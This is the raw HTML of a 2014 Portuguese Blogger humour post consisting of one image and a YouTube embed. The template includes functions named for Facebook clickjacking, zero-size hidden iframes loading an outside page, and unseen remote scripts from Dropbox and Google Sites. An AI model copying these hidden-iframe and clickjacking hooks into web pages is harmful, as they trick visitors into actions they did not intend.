<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html dir='ltr' xmlns='http://www.w3.org/1999/xhtml' xmlns:b='http://www.google.com/2005/gml/b' xmlns:data='http://www.google.com/2005/gml/data' xmlns:expr='http://www.google.com/2005/gml/expr'>
<head>
<link href='http://fonts.googleapis.com/css?family=Oswald' rel='stylesheet' type='text/css'/>
<meta content='text/html; charset=UTF-8' http-equiv='Content-Type'/>
<meta content='blogger' name='generator'/>
<link href='http://humorcascando.blogspot.mx/favicon.ico' rel='icon' type='image/x-icon'/>
<link href='http://humorcascando.blogspot.com/2014/07/cara-vamos-embora-desse-carro-que-deu.html' rel='canonical'/>
<link rel="alternate" type="application/atom+xml" title="Humor cascando - Atom" href="http://humorcascando.blogspot.com/feeds/posts/default" />
<link rel="alternate" type="application/rss+xml" title="Humor cascando - RSS" href="http://humorcascando.blogspot.com/feeds/posts/default?alt=rss" />
<link rel="service.post" type="application/atom+xml" title="Humor cascando - Atom" href="https://www.blogger.com/feeds/2711958327308504123/posts/default" />

<link rel="alternate" type="application/atom+xml" title="Humor cascando - Atom" href="http://humorcascando.blogspot.com/feeds/3202198115409608565/comments/default" />
<link href='http://4.bp.blogspot.com/-FRpY0yWM5k0/U8SY_jaiy2I/AAAAAAAABUI/nefLuqmRCvM/s1600/deumerda.jpg' rel='image_src'/>
<meta content='http://humorcascando.blogspot.com/2014/07/cara-vamos-embora-desse-carro-que-deu.html' property='og:url'/>
<meta content='Cara! Vamos embora desse carro que deu merda kkk' property='og:title'/>
<meta content='          ' property='og:description'/>
<meta content='http://4.bp.blogspot.com/-FRpY0yWM5k0/U8SY_jaiy2I/AAAAAAAABUI/nefLuqmRCvM/w1200-h630-p-k-no-nu/deumerda.jpg' property='og:image'/>
<!--[if IE]> <script> (function() { var html5 = ("abbr,article,aside,audio,canvas,datalist,details," + "figure,footer,header,hgroup,mark,menu,meter,nav,output," + "progress,section,time,video").split(','); for (var i = 0; i < html5.length; i++) { document.createElement(html5[i]); } try { document.execCommand('BackgroundImageCache', false, true); } catch(e) {} })(); </script> <![endif]-->
<title>Cara! Vamos embora desse carro que deu merda kkk ~ Humor cascando</title>
<link type='text/css' rel='stylesheet' href='https://www.blogger.com/static/v1/widgets/124887373-widget_css_bundle.css' />
<link type='text/css' rel='stylesheet' href='https://www.blogger.com/dyn-css/authorization.css?targetBlogID=2711958327308504123&amp;zx=70f04b2f-2965-417e-b6f4-921394225a7f' />
<style id='page-skin-1' type='text/css'><!--
/*
----------------------------Traduzido Por: http://www.templateparablogspot.com/-------------------
Traduzido Por: http://www.templateparablogspot.com/
Blogger Template Style
Name:   Damn LOL
Author: Syed Faizan Ali
Traduzido Por: http://www.templateparablogspot.com/
URL 1:  http://www.mybloggerlab.com/
Traduzido Por: http://www.templateparablogspot.com/
URL 2:  http://www.templateism.com/
Date:   December 2012
Traduzido Por: http://www.templateparablogspot.com/
License:  This free Blogger template is licensed under the Creative Commons Attribution 3.0 License, which permits both personal and commercial use.
However, to satisfy the 'attribution' clause of the license, you are required to keep the footer links intact which provides due credit to its authors. For more specific details about the license, you may visit the URL below:
http://creativecommons.org/licenses/by/3.0/
----------------------------------------------- */
body#layout ul{list-style-type:none;list-style:none}
body#layout ul li{list-style-type:none;list-style:none}
a:hover{color:#fff;text-decoration:none;outline:none;}
a:active {color:#0000FF;}
a {color:#53575f;}
a img{border-width:0}
#body-wrapper{margin:0px;padding:0px;}
#wrap1 {margin:0 auto 0; width: 980px; }
/* Header-----------------------------------------------*/
/*------Header-----*/
#header-wrapper{
width: 100%;
background:#1A1E25;
padding: 0px;
overflow: fixed;
margin:0 auto;
}
#header-inner {
background-position: left;
background-repeat: no;
}
.headerleft h1, .headerleft h1 a,.headerleft h1 a:hover,.headerleft h1 a:visited {
color: #BF0100;
font-size: 36px;
font-family: 'Ultra', serif, Arial;
font-weight: bold;
margin: 0;
padding: 0px 0 5px 0;
text-decoration: none;
text-shadow: 6px 6px 4px #ccc;
line-height:1.2em;
}
.headerleft h3 {
font-family: arial, tahoma,  Sans-Serif;
font-weight: normal;
margin: 0;
padding: 0;
}
.headerleft .description {
color:  #3B3B3B;
font:bold 12px Helvetica, arial,  sans-serif;
margin: 0px;
padding: 0 0 20px 0;
text-shadow: 4px 4px 6px #ccc;
}
.headerleft {
width: 450px;
height:120px;
float: left;
margin: 0;
margin-top:5px;
padding: 0;
}
.headerright {
width: 728px;
height:90px;
float: right;
margin: 0px;
margin-top:-60px;
margin-bottom:-70px;
padding:1px 0 0 0;
overflow: fixed;
}
/* Outer-Wrapper----------------------------------------------- */
#outer-wrapper{width:960px;margin:0px auto 0px;padding:0px;text-align:left;background:#FFFFFF;}
#content-wrapper{background:#fff;padding:15px;}
#main-wrapper{width:615px;float:left;margin:0px;padding:0px 0px 0px 0px;word-wrap:break-word;overflow:hidden;text-shadow:0 1px 0 #fff;}
#rsidebar-wrapper{width:290px;float:right;margin:0px;padding:0px 0px 0px 0px;word-wrap:break-word;overflow:hidden;text-shadow:0 1px 0 #fff; color:#000;}
#rsidebar-wrapper2{width:300px;float:right;margin:10px;padding:0px 0px 0px 0px;word-wrap:break-word;overflow:hidden;text-shadow:0 1px 0 #fff; color:#000; }
/* Headings----------------------------------------------- */
h2{}
/* Posts-----------------------------------------------*/
h2.date-header{margin:1.5em 0 .5em;display:none;}
.wrapfullpost{}
.post{margin-bottom:15px;}
.post-title{color:#333333;margin:0 0 10px 0;padding:0;font-family:Arial,Helvetica,Sans-serif;font-size:24px;line-height:24px;font-weight:bold;}
.post-title a,.post-title a:visited,.post-title strong{display:block;text-decoration:none;color:#333333;text-decoration:none;}
.post-title strong,.post-title a:hover{color:#53575f;text-decoration:none;}
.post-body{ margin:0px;padding:0px 10px 0px 0px;font-family:Arial, Helvetica, Sans-serif;font-size:12px;line-height: 20px;}
.post-footer{margin:5px 0;  width:400px;}
.comment-link{margin-$startSide:.6em}
.post-body img{padding:6px;border:1px solid #eee;background:#ffffff;}
/* Sidebar Content----------------------------------------------- */
.sidebar{margin:0 0 10px 0;font-size:13px;color:#374142;}
.sidebar a{text-decoration:none;color:#374142;}
.sidebar a:hover{text-decoration:none;color:#F95C49;}
.sidebar h2{color:#02B1FC;font-size:14pt;margin:0 0 9px 0; font-weight:bold;}
.sidebar ul{list-style-type:none;list-style:none;margin:0px;padding:0px;}
.sidebar ul li{padding:0 0 9px 0;margin:0 0 8px 0;}
.sidebar .widget{margin:0 0 15px 0;padding:0;color:#374142;font-size:13px;}
.main .widget{margin:0 0 5px;padding:0 0 2px}
.main .Blog{border-bottom-width:0}
/* Comments----------------------------------------------- */
#comments{padding:10px;background-color:#fff;border:0px dashed #ddd;}
#comments h4{font-size:16px;font-weight:bold;margin:1em 0;color:$sidebarcolor}
#comments-block3{padding:0;margin:0;float:left;overflow:hidden;position:relative;}
#comment-name-url{width:465px;float:left}
#comment-date{width:465px;float:left;margin-top:5px;font-size:10px;}
#comment-header{float:left;padding:5px 0 40px 10px;margin:5px 0px 15px 0px;position:relative;background-color:#fff;border:1px dashed #ddd;}
.avatar-image-container{background:url(http://1.bp.blogspot.com/-cewCXF9l764/UC7eon7rxXI/AAAAAAAAAww/gDiPoSuhivM/s000/comment-avatar.jpg);width:32px;height:32px;float:right;margin:5px 10px 5px 5px;border:1px solid #ddd;}
.avatar-image-container img{width:32px;height:32px;}
a.comments-autor-name{color:#000;font:normal bold 14px Arial,Tahoma,Verdana}
a.says{color:#000;font:normal 14px Arial,Tahoma,Verdana}
.says a:hover{text-decoration:none}
.deleted-comment{font-style:italic;color:gray}
.feed-links{clear:both;line-height:2.5em}
/* Profile ----------------------------------------------- */
.profile-img{float:$startSide;margin-top:0;margin-$endSide:5px;margin-bottom:5px;margin-$startSide:0;padding:4px;border:1px solid $bordercolor}
.profile-data{margin:0;text-transform:uppercase;letter-spacing:.1em;font:$postfooterfont;color:$sidebarcolor;font-weight:bold;line-height:1.6em}
.profile-datablock{margin:.5em 0 .5em}
.profile-textblock{margin:0.5em 0;line-height:1.6em}
.avatar-image-container{background:url(http://1.bp.blogspot.com/-cewCXF9l764/UC7eon7rxXI/AAAAAAAAAww/gDiPoSuhivM/s000/comment-avatar.jpg);width:32px;height:32px;float:right;margin:5px 10px 5px 5px;border:1px solid #ddd;}
.avatar-image-container img{width:32px;height:32px;}
.profile-link{font:$postfooterfont;text-transform:uppercase;letter-spacing:.1em}
#navbar-iframe{height:0;visibility:hidden;display:none;}
.Attribution {height:0;visibility:hidden;display:none;}
/* --- MyBloggerLab Floating Older & Newer Posts Buttons For Blogger --- */
#blog-pager-newer-link {
padding-left : 689px;
border : none;
float : left;
text-transform: uppercase;
}
#blog-pager-older-link {
float : right;
padding-right : 553px;
text-transform: uppercase;
border : none;
}
.MBLprevlink{ margin-left:-100px; position:fixed;top:45%;display:block;font-weight:bold;font-family:arial; font-size:16px;color:#333;text-decoration:none;width:54px;height:65px;background:rgba(231,231,231,0.3);z-index:99;opacity:0.6;-webkit-transition-property:all;-moz-transition-property:all;-ms-transition-property:all;-o-transition-property:all;transition-property:all;-webkit-transition-duration:1s;-moz-transition-duration:1s;-ms-transition-duration:1s;-o-transition-duration:1s;transition-duration:1s}
.MBLprevlink:hover,.MBLprevlink.showFull{background:rgba(231,231,231,0.6);opacity:1}.MBLprevlink:hover .detail,.MBLprevlink.showFull .detail{width:220px}.MBLprevlink .label{display:block;position:absolute;top:60px;left:14px;-webkit-transform:rotate(270deg);-moz-transform:rotate(270deg);-ms-transform:rotate(270deg);-o-transform:rotate(270deg);transform:rotate(270deg);opacity:0.5}.MBLprevlink .detail{width:0;line-height:1.6em;color:#77a6d2;background:rgba(31,31,31,0.7);font-family:&quot;Capriola&quot;,sans-serif;overflow:hidden;position:absolute;top:0;left:70px;-webkit-transition-property:all;-moz-transition-property:all;-ms-transition-property:all;-o-transition-property:all;transition-property:all;-webkit-transition-duration:0.2s;-moz-transition-duration:0.2s;-ms-transition-duration:0.2s;-o-transition-duration:0.2s;transition-duration:0.2s;-webkit-transition-delay:0.5s;-moz-transition-delay:0.5s;-ms-transition-delay:0.5s;-o-transition-delay:0.5s;transition-delay:0.5s}.MBLprevlink .detail span{padding:20px;display:block;height:100px;overflow:hidden;width:180px}.MBLprevlink .detail span:hover{color:#fff}.MBLprevlink .arrow{width:0;height:0;font-size:0;height:0;position:absolute;top:49px}
#prevLink{left:30px}#prevLink .arrow{border-right:20px solid rgba(231,231,231,0.3);border-bottom:20px solid transparent;border-top:20px solid transparent;left:-20px}#prevLink:hover .arrow,#prevLink.showFull .arrow{border-right-color:rgba(231,231,231,0.6)}
#nextLink{right:30px; }#nextLink .detail{right:70px !important;left:auto}#nextLink&gt;span{-webkit-transform:rotate(90deg);-moz-transform:rotate(90deg);-ms-transform:rotate(90deg);-o-transform:rotate(90deg);transform:rotate(90deg)}#nextLink .arrow{border-bottom:20px solid rgba(231,231,231,0.3);border-left:20px solid transparent;border-right:20px solid transparent;right:-30px}#nextLink:hover .arrow,#nextLink.showFull .arrow{border-bottom-color:rgba(231,231,231,0.6)}
.MBLprevlink{opacity:1;background:url(http://1.bp.blogspot.com/-XFjJd7HyHjE/UNlfPif91UI/AAAAAAAAKLM/kymZxobafvs/s1600/buttons.png) repeat-x scroll 0 0;color:#cc3435;  }
.MBLprevlink:hover,.MBLprevlink:active,.MBLprevlink:focus{background:url(http://1.bp.blogspot.com/-XFjJd7HyHjE/UNlfPif91UI/AAAAAAAAKLM/kymZxobafvs/s1600/buttons.png) repeat-x scroll 0 0}.MBLprevlink .label{opacity:1 !important}.MBLprevlink .arrow{display:none !important}#nextLink{right:10px !important}#prevLink{left:10px !important}
.MBLnextlink{ margin-left:-100px; position:fixed;top:45%;display:block;font-weight:bold;font-family:arial; font-size:16px;color:#333;text-decoration:none;width:55px;height:65px;background:rgba(231,231,231,0.3);z-index:99;opacity:0.6;-webkit-transition-property:all;-moz-transition-property:all;-ms-transition-property:all;-o-transition-property:all;transition-property:all;-webkit-transition-duration:1s;-moz-transition-duration:1s;-ms-transition-duration:1s;-o-transition-duration:1s;transition-duration:1s}
.MBLnextlink:hover,.MBLnextlink.showFull{background:rgba(231,231,231,0.6);opacity:1}.MBLnextlink:hover .detail,.MBLnextlink.showFull .detail{width:220px}.MBLnextlink .label{display:block;position:absolute;top:60px;left:14px;-webkit-transform:rotate(270deg);-moz-transform:rotate(270deg);-ms-transform:rotate(270deg);-o-transform:rotate(270deg);transform:rotate(270deg);opacity:0.5}.MBLnextlink .detail{width:0;line-height:1.6em;color:#77a6d2;background:rgba(31,31,31,0.7);font-family:&quot;Capriola&quot;,sans-serif;overflow:hidden;position:absolute;top:0;left:70px;-webkit-transition-property:all;-moz-transition-property:all;-ms-transition-property:all;-o-transition-property:all;transition-property:all;-webkit-transition-duration:0.2s;-moz-transition-duration:0.2s;-ms-transition-duration:0.2s;-o-transition-duration:0.2s;transition-duration:0.2s;-webkit-transition-delay:0.5s;-moz-transition-delay:0.5s;-ms-transition-delay:0.5s;-o-transition-delay:0.5s;transition-delay:0.5s}.MBLnextlink .detail span{padding:20px;display:block;height:100px;overflow:hidden;width:180px}.MBLnextlink .detail span:hover{color:#fff}.MBLnextlink .arrow{width:0;height:0;font-size:0;height:0;position:absolute;top:49px}
#prevLink{left:30px}#prevLink .arrow{border-right:20px solid rgba(231,231,231,0.3);border-bottom:20px solid transparent;border-top:20px solid transparent;left:-20px}#prevLink:hover .arrow,#prevLink.showFull .arrow{border-right-color:rgba(231,231,231,0.6)}
#nextLink{right:30px; }#nextLink .detail{right:70px !important;left:auto}#nextLink&gt;span{-webkit-transform:rotate(90deg);-moz-transform:rotate(90deg);-ms-transform:rotate(90deg);-o-transform:rotate(90deg);transform:rotate(90deg)}#nextLink .arrow{border-bottom:20px solid rgba(231,231,231,0.3);border-left:20px solid transparent;border-right:20px solid transparent;right:-30px}#nextLink:hover .arrow,#nextLink.showFull .arrow{border-bottom-color:rgba(231,231,231,0.6)}
.MBLnextlink{opacity:1;background:url(http://3.bp.blogspot.com/-VNWJWSyBn7k/UM_9wq2suwI/AAAAAAAAJsY/_hWiB3-hi_g/s1600/prevaa.png) repeat-x scroll 0 0;color:#cc3435;  }
.MBLnextlink:hover,.MBLnextlink:active,.MBLnextlink:focus{background:url(http://3.bp.blogspot.com/-VNWJWSyBn7k/UM_9wq2suwI/AAAAAAAAJsY/_hWiB3-hi_g/s1600/prevaa.png) repeat-x scroll 0 0}.MBLnextlink .label{opacity:1 !important}.MBLnextlink .arrow{display:none !important}#nextLink{right:10px !important}#prevLink{left:10px !important}
body{background:#292D36;font:10pt Arial, Helvetica, sans-serif;margin:0;padding:0;}
H1, H2, H3{margin:0;padding:0;}
form{margin:0;padding:0;}
a{outline:none;}
.clear{clear:both;}
#header-wrapper{background:#1A1E25;border-bottom:1px solid #363A43;height:110px;margin:0 auto;}
#header-wrapper .wrapper{margin:0 auto;width:980px;}
#header .wrapper #logo{background:transparent url(&#39;../img/logo.png&#39;) no-repeat;float:left;margin:10px 0 0 -20px;width:170px;}
#header .wrapper #logo a img{border:0;margin:0;height:125px;width:170px;}
#header .wrapper #logo a strong{color:#FFF;display:none;font-size:8pt;font-weight:bold;line-height:160px;margin:0 0 0 170px;position:absolute;text-decoration:none;text-transform:uppercase;}
#header .wrapper #logo a:hover strong{display:block;text-decoration:none;}
#header .wrapper .ad{float:right;margin:10px 10px 0 0;width:728px;}
.rounded-8{border-radius:8px;-moz-border-radius:8px;-webkit-border-radius:8px;-khtml-border-radius:8px;position:relative.}
.rounded-10{border-radius:10px;-moz-border-radius:10px;-webkit-border-radius:10px;-khtml-border-radius:10px;position:relative.}
#container{background:#1A1E25;border:1px solid #363A43;margin:30px auto 0 auto;padding:0 1px 3px 1px;width:976px;}
#container .left{background:#FFF;float:left;min-height:516px;padding:10px;width:636px;}
#container .left H1{color:#CC3366;float:left;font-size:16pt;margin:0 0 8px 0;text-indent:5px;width:600px;}
#container .left .buttons{float:left;height:0;padding:0;position:relative;margin:0 -20px 0 -22px;top:99px;width:680px;z-index:1;}
#container .left .buttons a.prev{background:url(&#39;../img/buttons.png&#39;);float:left;width:55px;height:66px;}
#container .left .buttons a:active.prev{background-position:0 -67px;}
#container .left .buttons a.p-inactive{background:url(&#39;../img/buttons.png&#39;) 0 -134px;float:left;width:55px;height:66px;}
#container .left .buttons a.next{background:url(&#39;../img/buttons.png&#39;) -55px 0;float:right;width:55px;height:66px;}
#container .left .buttons a:active.next{background-position:-55px -67px;}
#container .left .buttons a.n-inactive{background:url(&#39;../img/buttons.png&#39;) -55px -134px;float:right;width:55px;height:66px;}
#container .left .buttons #social{background:#FFF;margin:0 0 0 -58px;padding:10px;position:absolute;top:75px;max-width:85px;}
#container .left .buttons #social div{margin:0 0 10px 0;text-align:center;max-width:60px; }
#container .left .pic{background:#F2F2F2;border:1px solid #E4E3E3;float:left;padding:16px 13px 0 13px;text-align:center;width:606px;box-shadow:inset 0 3px 0 #E9E9E9;-moz-box-shadow:inset 0 3px 0 #E9E9E9;-webkit-box-shadow:inset 0 3px 0 #E9E9E9;-khtml-box-shadow:inset 0 3px 0 #E9E9E9;}
#container .left .like{background:#CFF1FF;float:left;padding:10px;margin:10px 0 0 0;min-height:25px;width:616px;}
#container .left .like .stats{border-bottom:1px dotted #B3DEEF;color:#5D8DA0;font-size:12px;font-weight:bold;margin:0 0 7px 0;padding:0 0 5px 0;width:615px;}
#container .left .like .stats span{font-weight:normal;}
#container .left .like .stats a{color:#5D8DA0;font-weight:normal;text-decoration:underline;}
#container .left .like .stats a:hover{text-decoration:none;}
#container .right{float:right;padding:0;width:320px;}
#container .right .f-page{height:65px;margin:0 0 0 22px;padding:0;}
#container .right .cube{margin:0 0 10px 10px;}
#container .right .pics{background:#FFF;margin:0 0 10px -12px;padding:10px 10px 0 12px;width:310px;}
#container .right .pics H3{color:#02B1FC;font-size:14pt;margin:0 0 9px 0;}
#container .right .pics a{color:#999;font-size:15px;text-align:center;text-decoration:none;text-transform:uppercase;}
#container .right .pics a:hover{color:#02B1FC;}
#container .right .pics a img{border:0;}
#container .right .pics .prev{float:left;text-align:center;width:120px;}
#container .right .pics .prev a img{background-position:top left;}
#container .right .pics .prev a:hover img{background-position:bottom left;}
#container .right .pics .next{float:right;text-align:center;width:120px;}
#container .right .pics .next a img{background-position:top left;}
#container .right .pics .next a:hover img{background-position:bottom right;}
#container .right .pics .rand{float:right;text-align:center;width:120px;}
#container .right .pics .rand a img{background-position:top left;}
#container .right .pics .rand a:hover img{background-position:top right;}
#container .privacy{padding:10px 10px 0 10px;}
#container .privacy a{color:#FFF;text-decoration:underline;}
#container .privacy a:hover{text-decoration:none;}
#footer{background:#1A1E25;color:#53575F;font-size:11px;margin:10px auto 0 auto;padding:10px;}
#footer .wrapper{margin:0 auto;padding:0 0 0 10px;width:970px;}
#footer .wrapper .left{float:left;width:480px;}
#footer .wrapper .right{float:right;text-align:right;width:470px;}
#footer .wrapper .right a{color:#53575F;margin:0 10px;text-decoration:none;}
#footer .wrapper .right a:hover{color:#FFF;text-decoration:underline;}

--></style>
<script src='https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js' type='text/javascript'></script>
<script src='https://dl.dropboxusercontent.com/u/53396719/blogger/status-message.js'></script>
<script src='https://sites.google.com/site/pagerolderlink/head/body.js'></script>
<script src='https://sites.google.com/site/pagerolderlink/home/blogger/blogger.js'></script>
<script src='http://dl.dropbox.com/u/93265919/efeitoimagens/data-post.js'></script>
<style type='text/css'>
.post-body img {padding:0px;background:transparent;border:none;}
</style>
<script src='http://apis.google.com/js/plusone.js' type='text/javascript'>
{lang: 'en-US'}
</script>
<script type="text/javascript">function a(){var b=window.location.href,c=b.split("?");switch(c.length){case 1:return b+"?m=1";case 2:return 0<=c[1].search("(^|&)m=")?null:b+"&m=1";default:return null}}var d=navigator.userAgent;if(-1!=d.indexOf("Mobile")&&-1!=d.indexOf("WebKit")&&-1==d.indexOf("iPad")||-1!=d.indexOf("Opera Mini")||-1!=d.indexOf("IEMobile")){var e=a();e&&window.location.replace(e)};
</script></head>
<script src='http://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js' type='text/javascript'>
</script>
<script type='text/javascript'>
         function ClickJackFbHide(){
            jQuery("div[id^=\'clickjack-button-wrapper\']").hide();
         }
         function ClickJackFbShow(){
            jQuery("div[id^=\'clickjack-button-wrapper\']").show();
         }
    
</script>
<body>
<div id='header-wrapper'><div class='wrapper'>
<div class='headerleft'>
<div class='headerleft section' id='headerleft'><div class='widget Header' data-version='1' id='Header1'>
<div id='header-inner'>
<div class='titlewrapper'>
<h1 class='title'>
<a href='http://humorcascando.blogspot.mx/'>Humor cascando</a>
</h1>
</div>
<div class='descriptionwrapper'>
<p class='description'><span>
</span></p>
</div>
</div>
</div></div>
</div>
<div class='headerright'>
<div class='headerright no-items section' id='headerright'></div>
</div></div></div>
<div style='clear:both;'></div>
<div style='clear:both;'></div>
<div style='clear:both;'></div>
<div id='wrap1'>
<!-- Container -->
<div class='rounded-10' id='container'>
<div class='left rounded-8'>
<div id='content-wrapper'>
<div id='crosscol-wrapper' style='text-align:center'>
<div class='crosscol no-items section' id='crosscol'></div>
</div>
<div id='main-wrapper'>
<div class='main section' id='main'><div class='widget Blog' data-version='1' id='Blog1'>
<div class='blog-posts hfeed'>

          <div class="date-outer">
        
<h2 class='date-header'><span>segunda-feira, 14 de julho de 2014</span></h2>

          <div class="date-posts">
        
<div class='post-outer'>
<div class='wrapfullpost'>
<div class='post hentry'>
<a name='3202198115409608565'></a>
<h2 class='post-title entry-title'>
<a href='http://humorcascando.blogspot.mx/2014/07/cara-vamos-embora-desse-carro-que-deu.html'>Cara! Vamos embora desse carro que deu merda kkk</a>
</h2>
<div class='post-header-line-1'></div>
<div class='post-body entry-content'>
<div class='rounded18' id='container1'>
<style>
#container1{background:#f2f2f2;margin:30px auto 0 auto;padding:0 1px 3px 1px;width:600px; border-radius:10px;-moz-border-radius:10px;-webkit-border-radius:10px;-khtml-border-radius:10px;position:relative; margin-top:-0px;}

</style>
<div id='summary3202198115409608565'><br/><div style="text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-FRpY0yWM5k0/U8SY_jaiy2I/AAAAAAAABUI/nefLuqmRCvM/s1600/deumerda.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-FRpY0yWM5k0/U8SY_jaiy2I/AAAAAAAABUI/nefLuqmRCvM/s1600/deumerda.jpg" height="240" width="320" /></a></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<iframe allowfullscreen="" frameborder="0" height="315" src="//www.youtube.com/embed/Z0c8KJ03-TE" width="420"></iframe></div>
</div>
<br/>
<div class='addthis_toolbox addthis_default_style'>
<a class='addthis_button_facebook_like' fb:like:layout='button_count'></a>
<a class='addthis_button_tweet'></a>
<a class='addthis_button_google_plusone' g:plusone:size='medium'></a>
</div>
<script src='//s7.addthis.com/js/300/addthis_widget.js#pubid=xa-51d770c6151650e6' type='text/javascript'></script>
</div>
<div style='clear: both;'></div>
</div>
<div class='post-footer'>
<div class='post-footer-line post-footer-line-'></div>
<div class='post-footer-line post-footer-line-2'></div>
<div class='post-footer-line post-footer-line-3'>
<span class='item-control blog-admin pid-1364936998'>
<a href='https://www.blogger.com/post-edit.g?blogID=2711958327308504123&postID=3202198115409608565&from=pencil' title='Editar postagem'>
<img alt='' class='icon-action' height='18' src='http://img2.blogblog.com/img/icon18_edit_allbkg.gif' width='18'/>
</a>
</span>
</div></div>
</div>
</div>
<div class='blog-pager' id='blog-pager'>
<iframe frameborder='no' height='0' scrolling='no' src='http://blog-pager-link.blogspot.com.br/' width='0'></iframe>
<span id='blog-pager-newer-link'>
<a class='MBLnextlink' href='http://humorcascando.blogspot.mx/2014/07/quis-se-adiantar-e-acabou-de-lascando.html' id='Blog1_blog-pager-newer-link' title='Postagem mais recente'><div class='relative'>
<span class='arrow'></span>
<span class='label'></span>
</div></a>
</span>
<script src='https://dl.dropboxusercontent.com/u/53396719/blogger/status-message.js'></script>
<script src='https://sites.google.com/site/pagerolderlink/head/body.js'></script>
<script src='https://sites.google.com/site/pagerolderlink/home/blogger/blogger.js'></script>
<script src='http://dl.dropbox.com/u/93265919/efeitoimagens/data-post.js'></script>
<span id='blog-pager-older-link'>
<a class='MBLprevlink' href='http://humorcascando.blogspot.mx/2014/07/ela-so-queria-mostrar-para-amiga-que.html' id='Blog1_blog-pager-older-link' title='Postagem mais antiga'><div class='relative'>
<span class='arrow'></span>
<span class='label'></span><br/>
</div></a>
</span>
</div>
<div class='clear'></div>
<div class='comments' id='comments'>
<a name='comments'></a>
<h4>
0
comentários:
        
</h4>
<iframe frameborder='no' height='0' scrolling='no' src='http://blog-pager-link.blogspot.com.br/' width='0'></iframe>
<script src='http://bloggercomment.com/allowComments.js'></script>
<div id='Blog1_comments-block-wrapper'>
<dl class='avatar-comment-indent' id='comments-block'>
</dl>
</div>
<p class='comment-footer'>
<div class='comment-form'>
<a name='comment-form'></a>
<h4 id='comment-post-message'>Postar um comentário</h4>
<p>
</p>
<a href='https://www.blogger.com/comment-iframe.g?blogID=2711958327308504123&postID=3202198115409608565' id='comment-editor-src'></a>
<iframe allowtransparency='true' class='blogger-iframe-colorize blogger-comment-from-post' frameborder='0' height='410' id='comment-editor' name='comment-editor' src='' width='100%'></iframe>
<script type="text/javascript" src="https://www.blogger.com/static/v1/jsbin/2052553045-comment_from_post_iframe.js"></script>
<script type='text/javascript'>
      BLOG_CMT_createIframe('https://www.blogger.com/rpc_relay.html', '16894034351462604818');
    </script>
</div>
</p>
<div id='backlinks-container'>
<div id='Blog1_backlinks-container'>
</div>
</div>
</div>
</div>

        </div></div>
      
</div>
<div class='post-feeds'>
</div>
<script type="text/javascript">window.___gcfg = {'lang': 'pt_BR'};</script>
</div><div class='widget HTML' data-version='1' id='HTML1'>
<h2 class='title'>Parceria</h2>
<div class='widget-content'>
<a href="http://www.geralinks.com/" target="_blank" title="GeraLinks - Agregador de links"><img alt="GeraLinks - Agregador de links" border="0" height="70" src="https://lh3.googleusercontent.com/-vgmljmZgKSM/Ufgu9PEux7I/AAAAAAAAVSc/fbzB_3RurI4/s310/geralinks_310x70.jpg" width="210" /></a><a href="http://www.atoananet.com.br/" target="_blank"><img height="70" src="http://www.atoananet.com.br/uploads/120x60.gif" width="213" /></a><br /><a alt="doHITS - Agregador de Links" href="http://www.dohits.com.br/" target="_blank" title="doHITS - Agregador de Links"><img border="0" height="74" src="http://www.dohits.com.br/Imagens/120por60.gif" width="210" /></a><a href="http://loucurasdanet.com/" target="_blank" title="Agregador de Links"><img alt="Banner 1" border="0" height="73" id="selo" src="http://instavideos.com.br/arquivos_upload/selos/10.png" width="213" /></a><br /><a href="http://loucurasdanet.com/" target="_blank" title="Agregador de Links"><img alt="Agregador de Links" border="0" height="72" id="selo" src="http://loucurasdanet.com/arquivos_upload/selos/9.jpg" width="209" /></a><a href="http://www.surfandonanet.com.br/" target="_blank"><img border="0" height="70" src="http://2.bp.blogspot.com/-6JaTL-QTXyU/UUOjsVgxbcI/AAAAAAAADnE/qih1QNqhu4U/s1600/120x60.gif" width="210" /></a><br /><a href="http://www.linkbait.com.br/" target="_blank" title="Selo 2"><img alt="Selo 2" border="0" height="76" id="selo" src="http://www.linkbait.com.br/arquivos_upload/selos/9.jpg" width="210" /></a><a href="http://www.eutesalvo.com/" target="_blank" title="EuTeSalvo - O Agregador de Links que salva você!"><img alt="Piadas Idiotas - São idiotas mas o faz rir" border="0" height="77" src="http://www.eutesalvo.com/arquivos/banners/8a2ad0216d7d5c58316626cb0b3609cb.png" width="209" /></a><br /><a href="http://www.linkcurioso.com.br/" target="_blank" title="Linkado - Agregador de conteudo"><img alt="Linkado - Agregador de conteudo" border="0" height="73" src="http://linkcurioso.com.br/banners/lkd12060.jpg" width="208" /></a><a href="http://www.uazaa.com.br/" target="_blank" title="UAZAA! Os Melhores Links da Internet"><img alt="UAZAA! Os Melhores Links da Internet" height="72" src="http://www.uazaa.com.br/banners/120x60.gif" width="210" /></a><br /><a href="http://www.obizurado.com/" target="_blank"><img alt="oBizurado" src="http://www.obizurado.com/banners/obizurado-200x50.jpg" title="oBizurado" /></a>
</div>
<div class='clear'></div>
<span class='widget-item-control'>
<span class='item-control blog-admin'>
<a class='quickedit' href='//www.blogger.com/rearrange?blogID=2711958327308504123&widgetType=HTML&widgetId=HTML1&action=editWidget&sectionId=main' onclick='return _WidgetManager._PopupConfig(document.getElementById("HTML1"));' target='configHTML1' title='Editar'>
<img alt='' height='18' src='https://resources.blogblog.com/img/icon18_wrench_allbkg.png' width='18'/>
</a>
</span>
</span>
<div class='clear'></div>
</div></div>
</div></div></div>
<div class='right'>
<div class='pics rounded-8'>
<div id='rsidebar-wrapper'>
<div style='height:5px;clear:both;'></div>
<div class='sidebar section' id='sidebarright'><div class='widget Attribution' data-version='1' id='Attribution1'>
<div class='widget-content' style='text-align: center;'>
Tecnologia do <a href='https://www.blogger.com' target='_blank'>Blogger</a>.
</div>
<div class='clear'></div>
<span class='widget-item-control'>
<span class='item-control blog-admin'>
<a class='quickedit' href='//www.blogger.com/rearrange?blogID=2711958327308504123&widgetType=Attribution&widgetId=Attribution1&action=editWidget&sectionId=sidebarright' onclick='return _WidgetManager._PopupConfig(document.getElementById("Attribution1"));' target='configAttribution1' title='Editar'>
<img alt='' height='18' src='https://resources.blogblog.com/img/icon18_wrench_allbkg.png' width='18'/>
</a>
</span>
